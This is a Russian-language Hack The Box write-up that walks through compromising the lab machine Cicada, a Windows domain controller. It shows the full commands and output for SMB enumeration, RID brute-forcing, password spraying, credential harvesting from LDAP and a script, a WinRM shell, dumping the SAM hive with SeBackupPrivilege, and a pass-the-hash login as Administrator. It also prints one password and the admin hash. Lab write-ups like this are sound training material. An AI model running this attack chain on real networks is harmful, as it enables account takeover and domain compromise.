CICADA HTB Write-Up

CICADA HTB Write-Up

spl4ff

Сегодня мы разберем пошаговое решение машины CICADA с Hack The Box. Эта легкая Windows-машина, созданная пользователем theblxckcicada.


Сперва просканируем тачку при помощи nmap, чтобы понять какие порты и сервисы крутятся на ней.

$ nmap -sCV 10.10.11.35 -p- 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 05:51 EST
Nmap scan report for 10.10.11.35
Host is up (0.058s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT   STATE SERVICE    VERSION
53/tcp  open domain    Simple DNS Plus
88/tcp  open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-30 17:54:12Z)
135/tcp  open msrpc     Microsoft Windows RPC
139/tcp  open netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open ldap     Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp  open microsoft-ds?
464/tcp  open kpasswd5?
593/tcp  open ncacn_http  Microsoft Windows RPC over HTTP 1.0
636/tcp  open ssl/ldap   Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap     Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap   Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
54750/tcp open msrpc     Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|  date: 2024-12-30T17:55:07
|_ start_date: N/A
| smb2-security-mode: 
|  3:1:1: 
|_  Message signing enabled and required
|_clock-skew: 6h59m47s


После сканирования добавляем в /etc/hosts DNS имена.

$ echo "10.10.11.35 cicada.htb CICADA-DC.cicada.htb | sudo tee -a /etc/hosts


Открытый порт SMB, мы можем попытаться использовать его, чтобы проверить анонимный доступ или использование случайных учетных записей пользователей. Для этого можно использовать netexec.

$ nxc smb cicada.htb -u "anonymous" -p ""     
SMB     10.10.11.35   445  CICADA-DC    [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB     10.10.11.35   445  CICADA-DC    [+] cicada.htb\anonymous: (Guest)


Так как SMB пускает пользователей без пароля, то у нас есть возможность получить список доступных папок.

$ nxc smb cicada.htb -u "anonymous" -p "" --shares
SMB     10.10.11.35   445  CICADA-DC    [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB     10.10.11.35   445  CICADA-DC    [+] cicada.htb\anonymous: (Guest)
SMB     10.10.11.35   445  CICADA-DC    [*] Enumerated shares
SMB     10.10.11.35   445  CICADA-DC    Share      Permissions   Remark
SMB     10.10.11.35   445  CICADA-DC    -----      -----------   ------
SMB     10.10.11.35   445  CICADA-DC    ADMIN$             Remote Admin
SMB     10.10.11.35   445  CICADA-DC    C$               Default share
SMB     10.10.11.35   445  CICADA-DC    DEV               
SMB     10.10.11.35   445  CICADA-DC    HR       READ       
SMB     10.10.11.35   445  CICADA-DC    IPC$      READ      Remote IPC
SMB     10.10.11.35   445  CICADA-DC    NETLOGON            Logon server share 
SMB     10.10.11.35   445  CICADA-DC    SYSVOL             Logon server share 


Отлично, нам доступны для чтения две папки HR и IPC$. Посмотрим, что в них находится.

В папке HR находим файл Notice from HR.txt и скачиваем его.

$ smbclient -U 'anonymous' -p '' //cicada.htb/HR -N
Try "help" to get a list of possible commands.
smb: \> dir
 .                  D    0 Thu Mar 14 08:29:09 2024
 ..                 D    0 Thu Mar 14 08:21:29 2024
 Notice from HR.txt         A   1266 Wed Aug 28 13:31:48 2024

4168447 blocks of size 4096. 421997 blocks available
smb: \> mget *
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (5.9 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> exit


Открыв этот файл на системе, видим, что в нем содержится пароль, но неизвестно от какого пользователя.

$ cat Notice\ from\ HR.txt 

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada**********

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp


Так как в файле не сказано, чей это пароль, то придется перебрать пользователей с помощью rid-brute.

$ nxc smb cicada.htb -u "anonymous" -p "" --rid-brute
SMB     10.10.11.35   445  CICADA-DC    [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB     10.10.11.35   445  CICADA-DC    [+] cicada.htb\anonymous: (Guest)
SMB     10.10.11.35   445  CICADA-DC    498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    500: CICADA\Administrator (SidTypeUser)
SMB     10.10.11.35   445  CICADA-DC    501: CICADA\Guest (SidTypeUser)
SMB     10.10.11.35   445  CICADA-DC    502: CICADA\krbtgt (SidTypeUser)
SMB     10.10.11.35   445  CICADA-DC    512: CICADA\Domain Admins (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    513: CICADA\Domain Users (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    514: CICADA\Domain Guests (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    515: CICADA\Domain Computers (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    516: CICADA\Domain Controllers (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    517: CICADA\Cert Publishers (SidTypeAlias)
SMB     10.10.11.35   445  CICADA-DC    518: CICADA\Schema Admins (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    519: CICADA\Enterprise Admins (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    525: CICADA\Protected Users (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    526: CICADA\Key Admins (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB     10.10.11.35   445  CICADA-DC    571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB     10.10.11.35   445  CICADA-DC    572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB     10.10.11.35   445  CICADA-DC    1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB     10.10.11.35   445  CICADA-DC    1101: CICADA\DnsAdmins (SidTypeAlias)
SMB     10.10.11.35   445  CICADA-DC    1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    1103: CICADA\Groups (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    1104: CICADA\john.smoulder (SidTypeUser)
SMB     10.10.11.35   445  CICADA-DC    1105: CICADA\sarah.dantelia (SidTypeUser)
SMB     10.10.11.35   445  CICADA-DC    1106: CICADA\michael.wrightson (SidTypeUser)
SMB     10.10.11.35   445  CICADA-DC    1108: CICADA\david.orelious (SidTypeUser)
SMB     10.10.11.35   445  CICADA-DC    1109: CICADA\Dev Support (SidTypeGroup)
SMB     10.10.11.35   445  CICADA-DC    1601: CICADA\emily.oscars (SidTypeUser)


Для удобства соберем всех пользователей в один список, чтоб дальше использовать его для перебора нужной учетной записи.

$ nxc smb cicada.htb -u "anonymous" -p "" --rid-brute | grep "SidTypeUser" | awk -F'\' '{print $2}' | awk '{print $1}' | tee usernames.txt

Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars


Используем технику password spraying, чтоб найти нужного пользователя и получить доступ к другим SMB-шарам.

$ nxc smb cicada.htb -u usernames.txt -p "Cicada*********" --continue-on-success
SMB     10.10.11.35   445  CICADA-DC    [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\Administrator:Cicada******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\Guest:Cicada******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\krbtgt:Cicada******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\CICADA-DC$:Cicada******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\john.smoulder:Cicada******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\sarah.dantelia:Cicada******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [+] cicada.htb\michael.wrightson:Cicada******** 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\david.orelious:Cicada******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\emily.oscars:Cicada******** STATUS_LOGON_FAILURE


Теперь у нас есть данные пользователя michael.wrightson с доступом по SMB. Посмотрим, что он сможет нам предоставить.

$ nxc smb cicada.htb -u michael.wrightson -p "Cicada********" --shares
SMB     10.10.11.35   445  CICADA-DC    [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB     10.10.11.35   445  CICADA-DC    [+] cicada.htb\michael.wrightson:Cicada******** 
SMB     10.10.11.35   445  CICADA-DC    [*] Enumerated shares
SMB     10.10.11.35   445  CICADA-DC    Share      Permissions   Remark
SMB     10.10.11.35   445  CICADA-DC    -----      -----------   ------
SMB     10.10.11.35   445  CICADA-DC    ADMIN$             Remote Admin
SMB     10.10.11.35   445  CICADA-DC    C$               Default share
SMB     10.10.11.35   445  CICADA-DC    DEV               
SMB     10.10.11.35   445  CICADA-DC    HR       READ       
SMB     10.10.11.35   445  CICADA-DC    IPC$      READ      Remote IPC
SMB     10.10.11.35   445  CICADA-DC    NETLOGON    READ      Logon server share 
SMB     10.10.11.35   445  CICADA-DC    SYSVOL     READ      Logon server share 


У него есть доступ до SYSVOL и NETLOGON, которые ранее нам были недоступны, но полезной информации там нет. Поищем в другом месте. Например, посмотрим LDAP, извлечем оттуда всех пользователей и попробуем найти пароли.

$ ldapsearch -H ldap://cicada.htb -D 'michael.wrightson@cicada.htb' -w 'Cicada********' -b 'dc=cicada,dc=htb' "(objectClass=person)" | grep "sAMAccountName:"
sAMAccountName: Administrator
sAMAccountName: Guest
sAMAccountName: CICADA-DC$
sAMAccountName: krbtgt
sAMAccountName: john.smoulder
sAMAccountName: sarah.dantelia
sAMAccountName: michael.wrightson
sAMAccountName: david.orelious
sAMAccountName: emily.oscars


$ ldapsearch -H ldap://cicada.htb -D 'michael.wrightson@cicada.htb' -w 'Cicada********' -b 'dc=cicada,dc=htb' | grep pass                   
description: Members in this group can have their passwords replicated to all 
description: Members in this group cannot have their passwords replicated to a
description: Just in case I forget my password is aRt********


Находим новый пароль, но опять не понятно чей он. Снова поспреим пароль на всех пользователей.

$ nxc smb cicada.htb -u usernames.txt -p "aRt********" --continue-on-success
SMB     10.10.11.35   445  CICADA-DC    [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\Administrator:aRt******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\Guest:aRt******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\krbtgt:aRt******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\CICADA-DC$:aRt******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\john.smoulder:aRt******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\sarah.dantelia:aRt******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\michael.wrightson:aRt******** STATUS_LOGON_FAILURE 
SMB     10.10.11.35   445  CICADA-DC    [+] cicada.htb\david.orelious:aRt******** 
SMB     10.10.11.35   445  CICADA-DC    [-] cicada.htb\emily.oscars:aRt******** STATUS_LOGON_FAILURE


Пароль принадлежит david.orelious, теперь с его помощью получаем доступ к папке DEV.

$ nxc smb cicada.htb -u david.orelious -p "aRt********" --shares
SMB     10.10.11.35   445  CICADA-DC    [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB     10.10.11.35   445  CICADA-DC    [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB     10.10.11.35   445  CICADA-DC    [*] Enumerated shares
SMB     10.10.11.35   445  CICADA-DC    Share      Permissions   Remark
SMB     10.10.11.35   445  CICADA-DC    -----      -----------   ------
SMB     10.10.11.35   445  CICADA-DC    ADMIN$             Remote Admin
SMB     10.10.11.35   445  CICADA-DC    C$               Default share
SMB     10.10.11.35   445  CICADA-DC    DEV       READ       
SMB     10.10.11.35   445  CICADA-DC    HR       READ       
SMB     10.10.11.35   445  CICADA-DC    IPC$      READ      Remote IPC
SMB     10.10.11.35   445  CICADA-DC    NETLOGON    READ      Logon server share 
SMB     10.10.11.35   445  CICADA-DC    SYSVOL     READ      Logon server share 


Находим там интересный файл Backup_script.ps1 и забираем его, чтобы посмотреть содержимое.

$ smbclient -U 'david.orelious' //cicada.htb/DEV 
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
 .                  D    0 Thu Mar 14 08:31:39 2024
 ..                 D    0 Thu Mar 14 08:21:29 2024
 Backup_script.ps1          A   601 Wed Aug 28 13:28:22 2024

4168447 blocks of size 4096. 424465 blocks available
smb: \> mget *
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
smb: \> exit


В этом Powershell скрипте находится пароль от пользователя emily.oscars.

$ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@********" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"


С помощью netexec узнаем, что у emily.oscars есть доступ по WinRM.

$ nxc winrm cicada.htb -u emily.oscars -p "Q\!3@Lp#*******"     
WINRM    10.10.11.35   5985  CICADA-DC    [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM    10.10.11.35   5985  CICADA-DC    [+] cicada.htb\emily.oscars:Q\!3@Lp#******* (Pwn3d!)


Воспользуемся ее учетной записью и подключимся к машине.

$ evil-winrm -i cicada.htb -u emily.oscars -p "Q\!3@Lp#*******"          
                     
Evil-WinRM shell v3.7
                     
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                     

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                     
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> 


Переходим в каталог C:\Users\emily.oscars.CICADA\Desktop и забираем оттуда первый флаг user.txt.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir

  Directory: C:\Users\emily.oscars.CICADA\Desktop

Mode         LastWriteTime     Length Name
----         -------------     ------ ----
-ar---    12/30/2024  3:02 AM       34 user.txt

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
590503559907d6a**********
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

  Connection-specific DNS Suffix . :
  Link-local IPv6 Address . . . . . : fe80::88fc:2412:d38:1fd7%6
  IPv4 Address. . . . . . . . . . . : 10.10.11.35
  Subnet Mask . . . . . . . . . . . : 255.255.255.0
  Default Gateway . . . . . . . . . : 10.10.10.2
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> hostname
CICADA-DC
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami
cicada\emily.oscars


Для получения root.txt нам необходимо повысить привилегии. Сделать это можно с помощью SeBackupPrivilege, которая есть у emily.oscars.

*Evil-WinRM* PS C:\tmp> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name        Description          State
============================= ============================== =======
SeBackupPrivilege       Back up files and directories Enabled
SeRestorePrivilege      Restore files and directories Enabled
SeShutdownPrivilege      Shut down the system      Enabled
SeChangeNotifyPrivilege    Bypass traverse checking    Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


С помощью этой привилегии мы можем сдампить ветки реестра SAM и SYSTEM для дальнейшего извлечения пароля администратора. Делаем дампы и скачиваем их себе на тачку.

*Evil-WinRM* PS C:\tmp> reg save hklm\sam sam
The operation completed successfully.

*Evil-WinRM* PS C:\tmp> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\tmp> download sam 

Info: Downloading C:\tmp\sam to sam 

Info: Download successful! 

*Evil-WinRM* PS C:\tmp> download system 

Info: Downloading C:\tmp\system to system 

Info: Download successful!


При помощи pypykatz получаем хэши пользователей, но нам нужен лишь один - хэш администратора.

$ pypykatz registry --sam sam system
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c9**************:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931**************:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae93**************:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73**************:::


Теперь проведем атаку Pass-the-Hash, таким образом мы получаем доступ к тачке с правами администратора.

Переходим в каталог C:\Users\Administrator\Desktop и вычитываем флаг из файла root.txt.

$ evil-winrm -i cicada.htb -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341   
                     
Evil-WinRM shell v3.7
                     
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                     
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                     
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\users\administrator\desktop
*Evil-WinRM* PS C:\users\administrator\desktop> dir

  Directory: C:\users\administrator\desktop

Mode         LastWriteTime     Length Name
----         -------------     ------ ----
-ar---    12/30/2024  3:02 AM       34 root.txt

*Evil-WinRM* PS C:\users\administrator\desktop> type root.txt
c4c631bf1c48315**********
*Evil-WinRM* PS C:\users\administrator\desktop> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

  Connection-specific DNS Suffix . :
  Link-local IPv6 Address . . . . . : fe80::88fc:2412:d38:1fd7%6
  IPv4 Address. . . . . . . . . . . : 10.10.11.35
  Subnet Mask . . . . . . . . . . . : 255.255.255.0
  Default Gateway . . . . . . . . . : 10.10.10.2
*Evil-WinRM* PS C:\users\administrator\desktop> hostname
CICADA-DC
*Evil-WinRM* PS C:\users\administrator\desktop> whoami
cicada\administrator


Report Page